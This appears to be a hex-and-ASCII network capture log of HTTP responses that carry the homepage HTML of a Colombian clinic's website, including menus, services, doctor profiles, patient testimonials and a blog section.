                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2669INData Raw: 38 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 62 65 74 77 65 65 6e 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 23 73 75 62 73 75 62 6d 65 6e
                                                                                                                                                                                                                                                        Data Ascii: 8000 <li class="nav-item ps-2"> <a class="nav-link d-flex justify-content-between" data-bs-toggle="collapse" href="#subsubmen
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2673INData Raw: 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </li> </ul> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2677INData Raw: 69 63 69 6f 73 2f 61 73 65 73 6f 72 69 61 2d 65 6e 2d 6c 61 63 74 61 6e 63 69 61 2d 6d 61 74 65 72 6e 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 41 73 65 73 6f 72 c3 ad 61 20 65 6e 20 6c 61 63 74 61 6e 63 69 61 20 6d 61 74 65 72 6e 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: icios/asesoria-en-lactancia-materna" target="_self">Asesora en lactancia materna</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2681INData Raw: 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 73 69 73 74 65 6d 61 2d 64 65 2d 69 6e 66 6f 72 6d 61 63 69 6f 6e 2d 79 2d 61 74 65 6e 63 69 6f 6e 2d 61 6c 2d 75 73 75 61 72 69 6f 2d 73 69 61 75 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 53 69 73 74 65 6d 61 20 64 65 20 49 6e 66 6f 72 6d 61
                                                                                                                                                                                                                                                        Data Ascii: ><a href="pacientes/educacion-al-paciente/sistema-de-informacion-y-atencion-al-usuario-siau" target="_self" class="nav-link">Sistema de Informa
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2685INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 76 61 63 75 6e 61 63 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </li> <li class="nav-item ps-2 "><a href="pacientes/educacion-al-paciente/vacunacion"
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2689INData Raw: 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 63 6f 6e 74 61 63 74 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 6f 6e 74 c3 a1 63 74 61 6e 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: m ps-2 "><a class="nav-link" href="https://www.clinicasanluis.com.co/contacto" target="_self">Contctanos</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2693INData Raw: 52 4b 45 4e 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 4c 49 44 45 20 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                                                                                                                                                                                                                                        Data Ascii: RKEN --> </li> ... SLIDE --> <l
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2698INData Raw: 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 63 61 62 65 7a 6f 74 65 73 2d 6d 6f 62 69 6c 65 2f 77 65 62 2d 36 39 36 2d 35 37 37 2d 39 37 34 2e 77 65 62 70 22 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 61 7a 79 6c 6f 61 64 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 63 61 62 65 7a 6f 74 65 73 2d 6d 6f 62 69 6c 65 2f 77 65 62 2d 36 39 36 2d 35 37 37 2d 39 37 34 2e 77 65 62 70 22 20 64 61 74 61 2d 6b 65 6e 62 75 72 6e 7a 6f 6f 6d 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e
                                                                                                                                                                                                                                                        Data Ascii: g src="https://www.clinicasanluis.com.co/images/cabezotes-mobile/web-696-577-974.webp" alt="" data-lazyload="https://www.clinicasanluis.com.co/images/cabezotes-mobile/web-696-577-974.webp" data-kenburnzoom="https://www.clin
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2701INData Raw: 38 30 30 30 0d 0a 70 20 63 6c 61 73 73 3d 22 70 71 2d 66 61 6e 63 79 62 6f 78 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 70 71 2d 62 75 74 74 6f 6e 20 70 71 2d 62 75 74 74 6f 6e 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 63 6f 6e 74 61 63 74 6f 2f 61 67 65 6e 64 61 2d 74 75 2d 63 69 74 61 22 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: 8000p class="pq-fancybox-description"> </p> <a class="pq-button pq-button-link" href="https://www.clinicasanluis.com.co/contacto/agenda-tu-cita"
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2705INData Raw: 77 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 36 20 70 65 2d 78 6c 2d 35 73 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 73 74 61 72 74 22 3e 20 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 77 65 62 2d 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2d 31 36 39 34 31 37 34 37 36 38 2d 71 36 69 64 73 2e 77 65 62 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 74 69 74 6c 65 3d 22 43 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 22
                                                                                                                                                                                                                                                        Data Ascii: w align-items-center"> <div class="col-lg-6 pe-xl-5s align-self-start"> <img src="images/home/web-clinicasanluis-1694174768-q6ids.webp" alt="Clinicasanluis" loading="lazy" title="Clinicasanluis"
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2709INData Raw: 74 6c 65 22 3e 41 70 6f 79 6f 20 64 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 68 35 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: tle">Apoyo diagnstico</h5> </a> </div> </div> </div> </div>
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2713INData Raw: 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 72 76 69 63 65 2d 62 6f 78 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: " class="img-fluid"> </a> </div> <div class="pq-service-box-info">
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2717INData Raw: 20 70 71 2d 73 74 79 6c 65 2d 31 22 20 73 74 79 6c 65 3d 22 6d 69 6e 2d 68 65 69 67 68 74 3a 20 35 32 30 70 78 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 72 76 69 63 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 72 76 69 63 65 2d 69 6d 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 75 72 73 6f 2d 70 73 69 63 6f 70 72 6f 66 69 6c 61 63 74 69 63 6f 22 3e 0a 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: pq-style-1" style="min-height: 520px;"> <div class="pq-service-block"> <div class="pq-service-img"> <a href="servicios/curso-psicoprofilactico">
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2721INData Raw: 6c 65 2d 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 74 65 61 6d 2d 69 6d 67 22 3e 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 74 65 61 6d 73 2f 77 65 62 2d 64 72 2d 6a 6f 72 67 65 2d 67 61 72 63 69 61 2d 68 61 72 6b 65 72 2d 37 37 32 2d 31 33 30 2e 77 65 62 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 46 6f 74 6f 20 64 65 20 44 72 2e 20 4a 6f 72 67 65 20 47 61 72 63 c3 ad 61 20 48 61 72 6b 65 72 22 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: le-1"> <div class="pq-team-img"> <img src="https://www.clinicasanluis.com.co/images/teams/web-dr-jorge-garcia-harker-772-130.webp" alt="Foto de Dr. Jorge Garca Harker"
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2725INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 74 65 61 6d 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63
                                                                                                                                                                                                                                                        Data Ascii: </ul> </div> </div> <div class="pq-team-info"> <h5 c
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2730INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 74 65 61 6d 2d 69 6d 67 22 3e 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 74 65 61 6d 73 2f 77 65 62 2d 64 72 2d 68 75 67 6f 2d 66 65 72 72 65 69 72 61 2d 74 72 61 73 6c 61 76 69 6e 61 2d 33 36 37 2d 32 34 31 2e 77 65 62 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 46 6f 74 6f 20 64 65 20 44 72 2e 20 48 75 67 6f 20 46 65 72 72 65 69 72 61 20 54 72 61 73 6c 61 76 69 c3 b1 61 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <div class="pq-team-img"> <img src="https://www.clinicasanluis.com.co/images/teams/web-dr-hugo-ferreira-traslavina-367-241.webp" alt="Foto de Dr. Hugo Ferreira Traslavia"
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2733INData Raw: 38 30 30 30 0d 0a 6c 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 74 65 61 6d 2d 62 6f 78 20 70 71
                                                                                                                                                                                                                                                        Data Ascii: 8000l</span> </div> </div> </div> <div class="item"> <div class="pq-team-box pq
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2737INData Raw: 72 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 2d 70 72 65 66 69 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 74 69 6d 65 72 22 20 64 61 74 61 2d 74 6f 3d 22 34 30 34 39 39 22 20 64 61 74 61 2d 73 70 65 65 64 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 34 30 34 39 39 3c 2f 68 35 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: r-info"> <div class="pq-counter-num-prefix"> <h5 class="timer" data-to="40499" data-speed="5000"> 40499</h5>
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2741INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6d 6f 64 61 6c 5f 74 65 73 74 69 6d 6f 6e 79 2d 30 22 3e 50 61 63 69 65 6e 74 65 3a 20 4c 75 7a 20 4d 65 72 79 20 42 61 75 74 69 73 74 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 35 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 63 6f 6e 6f 63 69 6d 69 65 6e 74 6f 3a 20 43 72 69 73 74 69 61 6e 20 41 6e 64
                                                                                                                                                                                                                                                        Data Ascii: data-bs-target="#modal_testimony-0">Paciente: Luz Mery Bautista </h5> </a> <span>Reconocimiento: Cristian And
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2745INData Raw: 6e 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 74 65 73 74 69 6d 6f 6e 69 61 6c 2d 69 63 6f 6e 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 71 75 6f 74 65 2d 72 69 67 68 74 22 3e 3c 2f 69 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: n </span> </div> <div class="pq-testimonial-icon"> <i class="fas fa-quote-right"></i> </div> </div> </div>
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2749INData Raw: 69 76 3e 0a 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 3c 21 2d 2d 53 65 63 74 69 6f 6e 20 62 6c 6f 67 20 53 74 61 72 74 2d 2d 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 70 71 2d 62 6c 6f 67 20 70 71 2d 62 67 2d 67 72 65 79 20 70 71 2d 70 62 2d 32 31 30 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 63 74 69 6f 6e 20 70 71 2d 73 74 79 6c 65 2d 31 20 74 65 78 74 2d 63 65 6e 74 65 72
                                                                                                                                                                                                                                                        Data Ascii: iv> </div> ...Section blog Start--> <section class="pq-blog pq-bg-grey pq-pb-210"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="pq-section pq-style-1 text-center
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2753INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 39 30 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 35 31 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: width="903" height="516" loading="lazy" class="img-fluid"> </a>
